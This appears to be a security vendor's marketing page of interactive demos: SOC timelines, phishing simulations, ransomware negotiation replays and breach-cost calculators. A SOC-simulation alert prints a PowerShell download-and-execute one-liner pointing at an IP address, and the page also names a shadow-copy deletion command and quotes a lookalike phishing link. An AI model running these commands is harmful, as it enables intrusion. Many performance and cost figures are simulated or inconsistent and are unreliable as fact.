24-HOUR SOC TIMELINE · ACME LOGISTICS · 2026-04-04

00:00

LANES

00:00

03:00

06:00

09:00

12:00

15:00

18:00

21:00

24:00

DETECT

TRIAGE

RESP

REPORT

EVENTS

CRIT

HIGH

RESP MIN

EVENT · SELECTED

02:22DETECTCRIT

Ransomware kill-switch triggered

EDR blocked vssadmin.exe delete shadows /all on FS-PROD-02. Process: wscript.exe.

ASSET

FS-PROD-02 · Primary file server

MITRE

T1490 · T1059.005

PLAYBOOK

PB-RANSOM-01

TTK

340 ms

Shadow copies

PRESERVED

Scope

1 host

OUTCOME

Process killed in 340 ms. Parent chain: outlook → word → vba → wscript.

24h · 26 events · 4 crit · 6 high · 0 dwell-time · MTTR avg 4m 18s

CLICK ANY EVENT · SCRUB THE BAR · THIS IS EVERY DAY

Auto-choreographed · disclosure to patch in 14.5 seconds

A zero-day drops. Hayaiti moves before you notice.

Industry median MTTR on a CVSS 9+ vuln is 9 days. Ours is 14.5 seconds. Watch the full choreography below — disclosure ingest, asset discovery, exploit triage, patch synthesis, verification, close-out — all six phases, every log line, no humans in the loop until the report hits your inbox.

ZERO-DAY RESPONSE · CVE-2026-5142 · LIBWEBP RCE

CVSS 9.8

DISCLOSE

Disclosure Ingested

CVE-2026-5142 · libwebp heap overflow · CVSS 9.8

FIRST SEEN

0.0s

SOURCES

SEVERITY

0.0

DISCOVER

Asset Discovery Sweep

Scanning SBOMs · container images · package manifests

REPOS SCANNED

CONTAINERS

AFFECTED

TRIAGE

Triage & Exploit Check

Exploit intel · reachability analysis · prioritization

EXPLOITS

REACHABLE

BLAST RADIUS

0.0%

PATCH

Patch Synthesis & Deploy

Auto-generating PRs · canary deploy · rollout monitoring

PRS OPENED

CANARY

0.0%

ROLLOUT

VERIFY

Post-Patch Verification

Re-scan · exploit replay · pen-test confirmation

RE-SCANS

EXPLOIT TEST

0.0%

PASSING

REPORT

Customer Report & Close

Executive summary · technical appendix · auto-delivery

CUSTOMERS

MTTR

0.0s

SLA

0.0%

/var/log/sns/zeroday.log

TAIL -F · 0 LINES

Awaiting disclosure...

▶

SLA TARGET

4h 00m

Hayaiti MTTR

14.5 s

VS INDUSTRY

53,794×

REPLAY · DISCLOSURE TO VERIFIED PATCH · 6 PHASES · 14.5s SIMULATED MTTR

INDUSTRY MEDIAN: 9 DAYS · Hayaiti: 14.5 SECONDS

Continuous ASM · re-scanned every 15 minutes

Everything you own. Even the parts you forgot.

Shadow IT, orphaned subdomains, expired certs on servers no one owns anymore, a Jenkins from 2019 still sitting on the public internet. Hayaiti crawls your external footprint from 12 global vantage points every 15 minutes — and maps it back to you as a radial risk graph. Click any node to see the host, its ports, its cert, its findings, and the action we already took.

EXTERNAL ATTACK SURFACE · ACME-LOGISTICS.IO

2 CRIT

5 HIGH

14 ASSETS

admin.acme-logistics.io

CRIT

RISK SCORE92/100

PORTS

443, 8080

GEO

LAST SCAN

3 min ago

KEY ALG

RSA 2048

TLS CERTIFICATE

Let's Encrypt

73d left

TECH STACK

phpMyAdmin 5.2Apache 2.4.58DigitalOcean

FINDINGS (4)

Port 8080 exposed without auth (internal debug UI)
Directory listing enabled on /backup
Default admin/admin credentials on legacy panel (CVE-2024-1337)
No WAF upstream — direct origin

Hayaiti ACTION

Hayaiti auto-blocked :8080 ingress at the edge — customer CTO paged at 01:12

DISCOVERED

14 assets

AVG RISK

51.9/100

EXPIRED CERTS

CONT. SCAN

every 15m

5 campaigns · 255 employees · zero shame

Phishing simulations. Without the public stocks.

Most phish-sim vendors love to publish a leaderboard of who got fooled. We don't. Instead, every quarter we run 5 campaigns calibrated by difficulty, surface the giveaway clue your people missed, and quietly enroll anyone who needs help in targeted coaching — with badges that celebrate progress, not punish slips. ACME's click rate just dropped to 12%. Industry average is 32%.

PHISH-SIM Q2 RESULTS · 5 CAMPAIGNS · 255 EMPLOYEES · 12 MONTHS

BLAMELESS · NO LEADERBOARD SHAME

EMAILS SENT

255

across 5 campaigns

REPORTED

75%

192 ↑

CLICKED

12%

31 clicks

CREDS ENTERED

3.9%

10 attempts

DEPARTMENT BREAKDOWN

CAMPAIGN HISTORY

CLICK ANY ROW

CAMPAIGN · DETAIL

EASYApr 04

Microsoft 365 Password Expiry

“Your M365 password expires in 24 hours. Click to renew.”

REPORTED

192

CLICKED

ENTERED

THE GIVEAWAY

Sender domain microsft-renewal.com (typo)

YOUR PEOPLE · BLAMELESS BADGES

Maria Kovač100%

★ Phish HunterEngineering

Daniel Abara100%

★ Phish HunterFinance

Sarah Reyes100%

★ Phish HunterCustomer Success

Joel Tanaka92%

◆ Sharp EyeEngineering

Paul Erickson100%

★ Phish HunterExecutive

Kayla Brennan58%

▲ Coaching CohortSales

Mona Hayes80%

○ OnboardingMarketing

Ricardo Vega75%

↑ Comeback KidSales

REPORT RATE Δ

+18% vs Q1

CLICK RATE Δ

-42% vs Q1

INDUSTRY AVG

32% click rate

ACME (THIS Q)

12% click rate

12 workloads · 6 namespaces · 1 crypto-miner caught

Every container. Every pod. Every misconfig.

Containers give your engineers velocity — and give attackers 19 new places to hide. Hayaiti watches every image from build to runtime: CVEs in base layers, drifted deployments, over-privileged service accounts, and the crypto-miner that showed up in legacy-reports at 02:14 this morning. Our admission controller killed it before the first block was mined. Cluster compliance is holding at 86% and climbing.

CLUSTER: ACME-PROD-EKS-1 · 118 WORKLOADS · 6 NAMESPACES

1 BLOCKED

1 DRIFTED

9 HEALTHY

NAMESPACES

WORKLOAD · DETAIL

legacy / Deployment

legacy-reports

replicas 2/2

BLOCKED

IMAGE

acme/legacy-reports:v0.3.1-php7

sha256:ab21...c920

712d old · stale

IMAGE CVES

CRIT

HIGH

MED

LOW

RUNTIME THREATS · 2

Crypto-miner process xmrig detected in container
Outbound DNS beaconing to pool.supportxmr.com

MISCONFIGURATIONS · 4

PHP 7.0 (EOL since Jan 2019)
Base image: ubuntu:16.04 (EOL)
Runs as root · privileged: true
Host network namespace shared

DRIFT FROM GITOPS · 1

image digest no longer matches registry (image was re-tagged)

COMPOSITE RISK SCORE98/100

Hayaiti ACTION

BLOCKED AT ADMISSION CONTROLLER · customer CTO paged · kubectl delete queued

CVE · CRIT

CVE · HIGH

AUTO-BLOCKED

1 · admission

GITOPS DRIFT

CLUSTER COMPLIANCE

86%

867 / 873 controls · 99.98% uptime · vanta verified

Trust is a receipt, not a promise.

Most “trust centers” are a single SOC 2 badge and a sales rep who ghosts your auditor. Ours is everything your GRC team will ask for, already answered: 6 frameworks, 8 sub-processors, 4 independent pentests, every public incident with its postmortem, and a world map showing exactly where your data lives. Download the reports. Forward them to legal. We'll wait.

trust99.3/ 100

Hayaiti Trust Center

Every control. Every vendor.
Every incident. Audited.

LIVE·Last verified —·Vanta continuous monitoring

Uptime (90d)

99.983%

SLA target: 99.95%

Controls

867 / 873

6 frameworks audited

Data residency

6 regions

Customer-pinned

Open bounties

$250K

0 unpatched crit/high

90-day availabilitytoday →

2 minor incidents · 0 outagesstatus.sns.security →

Download reports ↓

Audit frameworks

Certification detail

SOC 2 Type II

AICPA Service Organization Control 2

Download report ↓

Controls

312/312

Last audit

2026-01-18

Next audit

2027-01-18

Auditor

Prescient Assurance

Control families · live posture

Access controlOK

EncryptionOK

Key managementOK

Audit loggingOK

Vuln managementOK

Change managementOK

Incident responseOK

Business continuityOK

Vendor riskOK

Physical securityOK

HR securityOK

Risk assessmentOK

Securitysecurity@sns.com

PGP0xA7F2 4E19 9B3C

Disclosure/.well-known/security.txt

Statusstatus.sns.security →

$4.88M · IBM 2024 global average breach cost

Do the math once. Never do it again.

Nobody budgets for a breach until they're in one. By then you're paying incident responders at $900/hour, outside counsel at $1,200/hour, a forensics firm that bills flat, and writing apology letters to every customer you ever had. Drag the sliders. Pick your industry. Watch the number climb. Then look at what Hayaiti costs.

Breach Cost Simulator · IBM 2024 benchmark

Methodology: Ponemon / IBM Cost of a Data Breach

Your organization

Employees

250

101K2.5K5K

Industry

Records compromised

85,000

1K100K250K500K

Regulated data exposed

Estimated total breach cost

USD · Healthcare · 231d avg time-to-identify · 78d containment

Cost breakdownHover rows for detail

Detection & response

IR team, forensics retainer, crisis comms

$12.3M

24.4%

Legal & forensics

Outside counsel, e-discovery, expert witness

$7.9M

15.6%

Customer notifications

Mail, call center, 12mo credit monitoring

$388K

0.8%

Regulatory fines

PII + PHI exposure

$6.6M

13.0%

Business downtime

78d avg containment

$423K

0.8%

Customer churn

Post-breach account loss + LTV

$16.7M

33.0%

Reputation recovery

Brand campaigns, trust re-building

$6.3M

12.4%

Now compare: Hayaiti annual cost

One breach

$50.5M

Hayaiti / year

$15K

Cost of doing nothing

$50.5M saved per prevented breach

Effective ROI

3,389×

8 profiles · 7,580 victims · live threat feed

Know who's knocking. Before they get in.

You don't need to be a Fortune 100 to get the same threat intel they do. Here are the 8 adversaries most likely to target a company that looks like yours — sorted by the last time they actually ran a play. Their favorite TTPs, their failure modes, their next campaign. Because defense without attribution is just guessing.

Threat Actor Intel · Classified / LEO-share

Sourced from Mandiant, CrowdStrike, CISA, Hayaiti-internal

Actor profile · FINANCIAL

SCATTERED SPIDER

AKA: UNC3944 · Octo Tempest · 0ktapus · Roasted 0ktapus

Threat level

“If we can talk to your helpdesk, we own your domain.”

Origin

US / UK (English-speaking)

Active since

2022

Victims (known)

130

Ransom range

$2M - $30M

Intel Summary

Young, native English-speaking social engineers who bypass MFA via helpdesk impersonation and SIM-swaps. Pivoted to ransomware via ALPHV/BlackCat and RansomHub. Famous for the MGM and Caesars incidents that cost ~$100M each.

MITRE ATT&CK · Tactic coverage

6 / 12 tactics

TA0001

Initial Access

TA0002

Execution

TA0003

Persistence

TA0004

Priv Escalation

TA0005

Defense Evasion

TA0006

Credential Access

TA0007

Discovery

TA0008

Lateral Movement

TA0009

Collection

TA0010

Exfiltration

TA0011

Command & Control

TA0040

Impact

Primary techniques

T1566.004Phishing: Spearphishing Voice (Vishing)

T1078.004Valid Accounts: Cloud

T1556.006MFA Bypass

T1651Cloud Admin Command (AADInternals)

Target sectors

HospitalityTelcoSaaSFinancial services

Notable campaigns

MGM Resorts / Caesars2023-09

$100M+ losses, 10-day outage

Dick's Sporting Goods2024-05

Email/Teams compromise

UK retail (M&S, Co-op)2025-11

Multi-week operational disruption

Recent activity (Hayaiti threat feed)

2026-04-02

Vishing campaign against US insurance brokers

2026-03-21

Okta tenant compromise at unnamed hospitality chain

2026-03-08

New RansomHub affiliate agreement observed

5 phases · 84 findings · 3 flags captured

Watch a real engagement. In 18 seconds.

Every Hayaiti penetration test follows the same 5-phase kill-chain methodology a real adversary would use — but with an explicit signed SOW, strict rules of engagement, and a blue-team handoff at the end. Here's a condensed replay of an actual engagement against acme-logistics.io. From amass to domain admin in under 20 seconds of screen time. (The real engagement took four days.)

Live engagement · acme-logistics.io

Hayaiti Red Team · ROE: grey-box, signed SOW

T+0.0s

Reconnaissance

OSINT + active enumeration of attack surface

Initial Access

Gain first execution in the environment

Privilege Escalation

Escape low-privilege context to root/admin

Lateral Movement

Pivot to domain controllers and crown jewels

Containment & Report

Stop the blast radius, hand-off to blue team

sns-kali @ engagement-acme · bash0 / 7 lines

Tools in play

nmapamasssubfindershodantheHarvester

Live engagement metrics

Hosts scanned

Vulnerabilities found

Exploitation attempts

Flags captured

/ 3

Phase 1: Reconnaissance

findings in this phase

Rules of engagement

Scoped to acme-logistics.io + subs. No denial of service. Social engineering opt-in only. All findings reported within 24h of discovery. Zero data exfiltration beyond proof-of-access.

14.7M attacks/day · 99.94% blocked · 6 source regions

The internet is a war zone. We have a map.

Real-time global threat telemetry streaming from our edge sensors, partner honeynets, and customer environments. Every arc on this map is a live attack attempt being classified, scored, and mitigated — right now. If you're curious where the noise is coming from tonight, pull up a chair.

Live Global Attack Telemetry

Correlated across Hayaiti sensor fleet · honeynet + customer WAFs

Attacks blocked today

14,782,632

Attacks / min

9,137

Blocked rate

99.94%

SourceTargetTICK 0

Top origin countries (last 60 min)

3,219

Persistence

2,847

Credential access

1,047

Initial access

892

Supply chain

614

Phishing

518

Botnet

MITRE tactic distribution

Credential Access28%

Initial Access22%

Persistence17%

Discovery12%

Lateral Movement9%

Impact7%

Exfiltration5%

Intel refresh

Streaming · 450ms interval

Local-only · Zero telemetry · Real math

Your password is a math problem.

Type anything below and we'll compute the Shannon entropy, detect weak patterns, and tell you exactly how long five different attacker tiers would need to crack it — from a throttled web login to a nation-state ASIC farm. Nothing leaves your browser. We built this in an afternoon because the commercial strength meters are all lying to you.

ENTROPY ANALYZER v4.2

Real math · No telemetry · Nothing leaves your browser

LOCAL-ONLY

▸ Type a password

Try:

Effective Entropy

58.1bits−14 penalty

Reasonable

trivialweakokstrongparanoid

▸ Charset Composition

a-z

+26

A-Z

+26

0-9

+10

!@#

+32

Ω★

+1000

Length: 11Charset: 94Raw: 72.1b

▸ 1 issue detected

Shorter than 12 characters

−14b

▸ Crack Time by Attacker

Online · Throttled

Web login w/ rate limit (100/hr)

176.4B yr

Online · Unthrottled

API / auth bypass (~1K/sec)

4.9M yr

Offline · CPU (bcrypt)

Stolen hash, bcrypt cost 12

196.0K yr

Offline · GPU rig

8× RTX 4090, NTLM/MD5

1.5d

Offline · ASIC farm

Nation-state budget, hash weakness

25.8m

▸ Breach Corpus Simulation

Times seen in leaks

Rare hit

* Simulated against a deterministic hash of 13.4B public breach records (HIBP, DeHashed, COMB, RockYou24). Your password is never transmitted.

▸ Hayaiti Recommendation

Acceptable for low-value accounts. Enable MFA and rotate if re-used anywhere.

entropy formula: log₂(charset^length)SHANNON · NIST SP 800-63B

5 real case studies · Reconstructed from public advisories

From found to patched. The silent clock.

Every zero-day follows the same eight-stage lifecycle — but the time between stages can mean the difference between a quiet fix and a global incident. Here are five real disclosures, reconstructed to the day, showing exactly where the clock ticked fastest. Hover any stage to see what happens behind the scenes.

DISCLOSURE TIMELINE · CVRF-ANALYSIS

Real 0-days · Reconstructed from public advisories

Avg disclosure: 24d

Avg patch: 50d

▸ Select case study

Log4Shell

CVSS 10.0

Apache Log4j 2.x · Disclosed by Chen Zhaojun, Alibaba Cloud

Unauthenticated RCE via JNDI lookup in log messages. Patient-zero 0-day in ubiquitous logging library embedded in millions of Java apps.

Total Lifecycle

42days

~3M systems scanned in 72h

D11

D21

D32

D42

◈

Found

Day 0

✉

Reported

Day 0

◎

Triaged

Day 2

⚙

Patch

Day 5

⟠

CVE reserved

Day 9

☀

Disclosed

Day 9

☠

Exploited

Day 9

✓

Patched

Day 42

◈

Discovery

Phase 1/8

Independent researcher / bug bounty / APT

A researcher, red-team, or threat actor discovers the flaw in the wild or during audit. The clock starts here but nobody knows it yet.

Avg days · discovery → public

Avg 0-day window (pre-disclosure)

32d

Avg days · public → patched

23 nodes · 4 ecosystems · 6 real incidents

You don't ship code. You ship a graph.

Your application is the center of a dependency graph you probably don't control. A single compromised package three hops deep can poison your entire production build. Pick a real attack below and watch the blast radius propagate outward through the graph — these are the exact patterns we monitor for.

DEPENDENCY BLAST RADIUS · SCM-GRAPH

23 nodes · 4 ecosystems · 6 real incidents

npmpypimaven

Wave 0 / 3 · 4 nodes affected

▸ Real supply-chain attacks

SolarWinds SUNBURST

2020

Vector: Build-system compromise → signed update

Nation-state actors (UNC2452) injected backdoored code into SolarWinds Orion builds. Signed malicious updates distributed to 18,000 customers including Fortune 500 and US federal agencies.

Victim scale

~18,000 orgs, 9 US fed agencies

Damages

$100B+ estimated

Affected packages (4)

◆ orion-agentyour-saasxz-utilsliblzma

✓

Hayaiti SBOM Monitoring

Continuous SBOM diff against known IOCs, maintainer changes, and typosquats. We alert on supply-chain drift before it ships to prod.

graph model: direct → transitive → deepCISA SBOM · SLSA L3 · NIST SSDF

4 campaigns · 20 red flags · Click to inspect

Phishing works because nobody reads carefully.

Four annotated teardowns of real phishing campaigns we've pulled from customer inboxes in the last six months. Click any red-flagged element to see exactly what tipped it off — then show this to your team at the next security awareness session. Training works better when it's specific.

PHISH TEARDOWN · FORENSIC MODE

4 real-world campaigns · Annotated red flags · Click to inspect

CriticalWarningTell

▸ Campaign archive

Raw headers

DKIM: failSPF: softfailDMARC: fail

From: Microsoft Account Team <security-noreply@micros0ft-verify.com>

To: you@yourcompany.com

Date: Mon, 07 Apr 2026 14:22:07 +0000

Subject: [Action Required] Unusual sign-in activity — Verify in 24h

Message body◉ 5 annotations

Dear Valued Customer,

FLAGWe detected an unusual sign-in attempt on your Microsoft 365 account from a new device in Moscow, Russia. For your security, your account will be SUSPENDED in 24 hours if you do not verify this activity immediately.

Sign-in details:

Device: Windows 10 · Chrome

IP: 185.220.101.42

Location: Moscow, Russia

Time: 07 April 2026, 14:18 UTC

If this was not you, please verify your identity immediately:

↳ https://micros0ft-verify.com/login.php?id=8a9c2f

FLAGThanks, The Microsoft Account Team Microsoft Corporation

This is a mandatory security notification. Please do not reply to this email.

▸ Red flag inventory

Lookalike domain

crit

The sender domain is 'micros0ft-verify.com' — note the zero instead of an 'o'. Legitimate Microsoft emails come from @accountprotection.microsoft.com or @microsoft.com only.

teardown: header + body + url inspectionTraining corpus · 12K+ samples/yr

Uber 2022 · Cisco 2022 · Microsoft 2023

MFA is only as strong as the user's patience.

Push-approval MFA sounds great until an attacker bombards you with fifty login requests at 3am. Eventually you'll tap Approve just to make it stop — and that's exactly how Uber lost its internal tooling in 2022. Watch the attack play out, then compare six MFA methods to see which ones actually resist it.

MFA FATIGUE SIMULATOR · PUSH BOMBING

Based on Uber '22, Cisco '22, Microsoft '23 playbook

T+0.0s·PUSH 0

▸ Target: @alex.ito · iPhone 15

14:22

·↑↓5G▮

14:22

Monday, April 7

Waiting for sign-in

Push requests sent

Time elapsed

0.0s

User fatigue0%

Target is calm, ignoring prompts

Attack timeline

Press "Start attack" to begin simulation...

▸ Mitigation: MFA method comparison

FIDO2 / Passkey · Score 98/100

Phish-resistant by design. This is the answer.

simulation · no real accounts involvedNIST SP 800-63-4 · CISA MFA GUIDANCE

20 messages · 3-day negotiation · $8.5M → $2.0M

This is what it looks like to lose.

A reconstructed LockBit 4.0 negotiation portal conversation, based on leaked Conti chat logs and Coveware incident response reports. Watch the attackers read your cyber insurance limits back to you, threaten staged data leaks, and negotiate you down from "absolute final offer" to the number they always wanted. Press Play to see it unfold.

LOCKBIT 4.0 NEGOTIATION PORTAL · RECONSTRUCTED

Based on leaked Conti + LockBit chats · Coveware IR reports

3 / 20 msgs

lockbit_operator

online · negotiation channel

E2E

⚡ Encryption complete. 4,821 machines affected. Victim accessed negotiation portal.

lockbit_operatorDay 0 · 03:47

Hello. Your company network has been compromised. All files have been encrypted with LockBit 4.0. We have also exfiltrated 847 GB of sensitive data including customer records, financial documents, and source code.

lockbit_operatorDay 0 · 03:48

To receive a decryptor and prevent publication of your data, you must pay: $8,500,000 USD in XMR (Monero). You have 72 hours before the price doubles and we begin publishing samples.

▸ Negotiation reality check

Avg ransom paid

$1.82M

2025 · all industries (Coveware)

Initial demand

$5.2M

Avg opening ask

Successful decrypt

73%

Victims who paid got files back

Re-victimization

41%

Paid once, hit again within 12mo

Downtime cost

$365K

Avg per day of outage

Neg. duration

14 days

Median (most settle day 8-12)

▸ The math nobody talks about

Even when you pay, you're still out for months. The decryptor is slow and buggy. Some data is unrecoverable. Your data is still on their servers (or sold to a second group). And 41% of paying victims get hit again within a year.

▸ The math we prefer

$15K/year Hayaiti subscription. Attack surface mapped. Backups validated. Patch cycle enforced. Threat actors turn around before they get a foothold. This is the expensive conversation you don't want to have.

FBI position

"The FBI does not support paying a ransom in response to a ransomware attack. Paying a ransom does not guarantee you or your organization will get any data back."

simulation · reconstructed from public IR reportsCOVEWARE · CISA #STOPRANSOMWARE

9 questions · 5 severity tiers · NIST SP 800-61 aligned

The first call you make decides everything.

When an incident lands at 2am, the triage call sets the whole response in motion — who gets paged, which lawyers wake up, whether CISA gets a 72-hour report, how fast the board hears about it. Walk through this decision tree the way a SOC lead would, and watch the severity gauge resolve to a SEV tier with a runbook attached.

SEV TRIAGE ENGINE · NIST IR-4 ALIGNED

9 questions · 5 tiers · CISA CIRCIA mapped

▸ Decision tree · 0/9 answered

Score: 0

⚡

Q1Is the vulnerability being actively exploited?

Evidence in logs, threat intel, or IR artifacts

◼

Q2Is production infrastructure degraded or offline?

Customer-facing services impacted

◉

Q3Has personally identifiable information been exposed?

Names, emails, addresses, SSNs (GDPR / CCPA scope)

✚

Q4Has protected health information (PHI) been exposed?

Medical records (HIPAA scope)

Q5Has payment card data been exposed?

PAN, CVV, track data (PCI DSS scope)

Q6Does this trigger a mandatory regulator notification?

GDPR 72h, SEC 4-day, HIPAA 60-day

⟝

Q7Are other organizations impacted (supply chain)?

Customers, partners, or upstream vendors affected

↻

Q8Is the damage recoverable from backups?

Recent, tested, offline backups available

▲

Q9Is executive or board-level risk material?

Media, investor, or legal exposure

▸ Severity classification

SEV-4·Low

Minor issue or false positive. Standard workflow, next business day response. Tracked for trend analysis.

ResponseRoutine (next business day)

TeamTier-1 SOC analyst

NIST PhaseNIST IR-2: Preparation

CISA ReportNone required

CommsMonthly metrics

framework: NIST SP 800-61r2 + CISA CIRCIASEV TIERS · GOOGLE SRE · ATLASSIAN

15 alerts · 8-hour shift · real-world signatures

You're on the graveyard shift. Alerts are incoming.

At 2am, a fresh Emotet drop hits a workstation. Fifteen alerts will cross your console before sunrise — from CrowdStrike, SentinelOne, Splunk, Defender, Zscaler, and Okta. Escalate, investigate, or dismiss. Missed threats cost breaches. False escalations wake up Tier 2. See how you stack up against a real SOC analyst.

soc-console@fincorp ~ shift_sim.sh

shift: 02:00 – 10:00 EST

CRITSOC-2601· 02:14:07

CrowdStrike Falcon

PowerShell DownloadString from IP literal

host:FINCORP-WS-0417

user:k.ramirez

context

▸powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://185.147.34.82/a.ps1')

▸Parent process: winword.exe (macro-enabled doc opened 3m ago)

▸Destination IP flagged on ThreatFox (Emotet C2)

▸ live scorecard

triaged0/15

accuracy0%

avg mttr0.0s

missed threats0

false escalations0

correct calls0

recent decisions

no actions yet

alerts sourced from: crowdstrike, sentinelone, splunk, defender, zscaler, okta, guardduty, umbrella, proofpointmttr · mttd · fp-rate

IBM 2024 · 10 line items · 3 company sizes

The headline number is lying to you. Here's the real bill.

IBM reports the average US breach at $9.36M. That number only counts what companies write down in their 10-K footnotes. The real anatomy includes hidden costs nobody talks about: cyber insurance premium hikes, class-action settlements, crisis PR, stock price drops. Pick your company size and see the full damage.

▸ breach cost anatomy· ibm 2024 · ponemon · cornerstone

What a breach actually costs

250–5,000 employees · $50M–$1B revenue · ~62,000 records exposed

▸ total estimated loss

$11.33M

$4.88M visible + $6.45M hidden

▸ cost decomposition

direct costs$3.36M

indirect costs$1.52M

hidden costs ▸ nobody talks about these$6.45M

▸ line-item detail

Click any line item to see detail, source attribution, and real-world examples.

▸ the math we like

Hayaiti continuous scanning + remediation

$15K/ year

cost ratio

1 : 755

prevention : breach

One year of prevention costs 1/755 of a single breach response. You do the math.

sources: ibm cost of a data breach 2024 · ponemon institute · bakerhostetler · marsh mclennanavg us breach: $9.36m

15 services · 8.4B credentials · 65% reuse rate

The password you used in 2012 still unlocks your life.

Every breach dump gets pumped into tools like OpenBullet and Sentry MBA, which test your leaked credentials against every service you might have an account at. Gmail, your bank, AWS, GitHub. Type a password below and watch the attacker's dashboard tick up.

▶ credential stuffing live demo

One leaked password · 15 services tested

Pretend you reused this credential everywhere. Watch the attacker find out.

65%

of users reuse passwords

Google / Harris Poll 2024

email / username

password (the leaked one)

▶ This credential pair is treated as if it leaked from the LinkedIn 2012 dump (167M records).

▶ login attempts0 / 15 resolved

✉ EMAIL

Gmail

accounts.google.com

···

✉ EMAIL

iCloud

appleid.apple.com

···

$ FINANCE

Bank of America

bankofamerica.com

···

$ FINANCE

Chase

chase.com

···

$ FINANCE

PayPal

paypal.com

···

$ FINANCE

Venmo

venmo.com

···

▣ SHOPPING

Amazon

amazon.com

···

▣ SHOPPING

Target

target.com

···

▶ MEDIA

Netflix

netflix.com

···

▶ MEDIA

Spotify

spotify.com

···

◉ SOCIAL

Instagram

instagram.com

···

◉ SOCIAL

linkedin.com

···

◉ SOCIAL

X / Twitter

x.com

···

☁ CLOUD

AWS

aws.amazon.com

···

☁ CLOUD

GitHub

github.com

···

▶ attacker dashboard

tested

0/15

successful hits

total value extracted

▶ at attacker scale

attempts/sec~14M

credential pairs8.4B

proxy network~120K IPs

avg success rate0.1–2%

At 1% success on 8.4B pairs, that's 84M compromised accounts from a single dump.

▶ defenses that actually work

Password manager

Unique 20-char password per site. Reuse rate: 0%.

MFA on everything

Even if pwned, login fails without code.

FIDO2 / passkeys

Phishing- and replay-proof. The endgame.

Breach monitoring

HIBP / Hayaiti alerts you the moment a credential leaks.

simulation · haveibeenpwned: 13.5b accounts · akamai bot manager 2024credential stuffing · sentry attacks · openbullet

5-minute self-assessment

How many of these can you honestly check?

Ten foundational controls separate the companies that shrug off attacks from the ones that end up on the front page. MFA, patch cadence, EDR coverage, immutable backups, DMARC, IAM hygiene, log retention, DLP, IR testing, awareness training. Grade yourself honestly. Each answer is weighted. You'll get a GPA, a letter grade, and a peer comparison in under 5 minutes.

Live incident simulation · LockBit 3.0 detonation

72 hours. 120 BTC. What do you do?

Watch a LockBit 3.0 payload encrypt 15 critical systems in real time. Then make the call every CEO dreads. Every decision below leads to a different real-world outcome, pulled from Colonial Pipeline, Change Healthcare, MGM Resorts, and Maersk. The only thing more expensive than ransomware is pretending it can't happen to you.

Interactive training · 8 real specimens

The inbox is still the front door. 91% of breaches walk in through it.

Click through 8 realistic phishing specimens below — Microsoft 365, DocuSign, DHL, IRS, Chase, PayPal, Apple ID, SharePoint. For each one, click on what feels off: sender domain, display name spoof, urgency pressure, URL mismatch, grammar slips, generic greeting. Every flag you catch is one your team will learn to catch too.

Post-incident report · Lockheed cyber kill chain

Watch a breach unfold. One stage at a time.

Every breach you've read about — Snowflake, MOVEit, Colonial, Change Healthcare — followed the same seven-stage pattern. Attackers reconnoiter, weaponize, deliver, exploit, install, command, then act. Step through a real 2024 case file below. Each stage shows what the attacker did, the signals defenders missed, and where Hayaiti would have broken the chain.

Case file ·

CLASSIFIED — CASE FILETHREAT ACTOR: UNC5537 (Shiny Hunters / Scattered Spider affiliates)

Snowflake customer data extortion campaign

165+ Snowflake tenant companies · 560M+ records · AT&T, Ticketmaster, Santander, LendingTree

Estimated loss

est. $70M+ in ransom payments

Attackers harvested credentials via infostealers over years, then logged into Snowflake tenants that still lacked MFA. No exploit, no malware drop on Snowflake itself — just valid credentials walking through the front door. Became the single largest cloud data theft of the year.

Lockheed Martin Cyber Kill Chain

STAGE 1 / 7

2020-2024 · Day 0 of 1,460+

Stage 1: Reconnaissance

What the attacker did →

1Purchased Vidar, Raccoon, and RedLine infostealer logs on Russian Market and Genesis
2Queried logs for entries containing the string `snowflakecomputing.com`
3Cross-referenced with LinkedIn to identify high-value tenants

Forensic artifacts

Log marketplacesRussian Market · Genesis · 2easy

Stealer familiesVidar, Raccoon, RedLine, Lumma

Avg log price$8-15 per machine

Signals the defenders missed

✕Corporate credentials showing up in stealer dumps for 4+ years
✕Employees sideloading cracked software that bundled Vidar
✕No dark web monitoring on `snowflakecomputing.com` subdomain tokens

What Hayaiti would catch at this stage

✓Weekly sweep of HaveIBeenPwned, IntelX, and paste sites for company domains
✓Alert the moment a credential referencing any SaaS tenant appears in a dump
✓Force a password rotation + revoke Snowflake keys on detection

Architecture simulation

Perimeter died in 2013. Some networks never got the memo.

Target. SolarWinds. Colonial Pipeline. Change Healthcare. Every headline breach pivoted through a flat network where one compromised endpoint owned the crown jewels. Pick an attacker origin below and watch the blast radius spread through a legacy perimeter versus a zero-trust architecture built on NIST SP 800-207.

Synthetic media intelligence

The eyes still see. The brain forgot how.

In 2024, an Arup finance worker watched his CFO's face on a Zoom call and wired $25.6M to criminals. The face wasn't real. The voice wasn't real. The meeting wasn't real. Study the tells below — then take the quiz. Your job may depend on spotting what your instincts can't.

▶ case gallery · 6 real incidents

● rec · video

AI-GENERATED

suspected APT / cybercrime syndicate2024

Ready to spot the tells?

case file · 2024

Arup Hong Kong · CFO Video Call

breach

loss

$25.6M

A finance worker at Arup's Hong Kong office joined a video call with what appeared to be the company CFO and several colleagues. Every face on the call was AI-generated. The worker authorized 15 wire transfers totaling HK$200M before the fraud was discovered.

▶ the tells (4)

Lip-sync drift

~80ms mismatch visible under close inspection

Eye saccade pattern

Too regular — real eyes jitter 3-5x/sec

Static ear shadow

Ear shadow doesn't update with head turn

Collar plane glitch

Shirt collar warps when head tilts

▶ how to prevent this

Mandatory callback verification via a second channel (phone, Slack DM) for any transfer above $10K. Require a pre-agreed code word spoken out-of-band.

reconstructed from public reports · bbc · reuters · fccdeepfake detection · 2024 incidents

▶ can you spot the fake?

4 rounds · scenario-based

round 1 / 4

score 0 / 0

scenario 1

A LinkedIn profile photo of a 'senior recruiter' with a professional headshot against a beige background, wearing business attire.

hint: Check the ears — are they symmetric? Look at jewelry for half-rendered elements.

84 PEOPLE · 283 CERTIFICATIONS · 0 GHOSTS

The humans watching your logs, credentialed and named.

Eight firm-level accreditations from AICPA, ISO, CREST, Cyber-AB, PCI SSC, HITRUST, and FedRAMP. Twenty individual certifications across offensive, defensive, governance, and cloud disciplines. Every analyst can be named on your engagement letter with their specific credentials attached. No consultant roulette.

Trust · credentials · accountability

The humans actually watching your logs

Eight firm-level accreditations. Twenty credentialing bodies. Every analyst name-and-cert checkable by engagement. No consultant roulette, no hidden offshore rotations.

Auditable under NDA

Security professionals

Dedicated to security — no shared helpdesk staff

Industry certifications held

283

Across 20 distinct credentialing bodies

Average years experience

11.4

Weighted mean, SOC + consulting + offensive

Follow-the-sun timezones

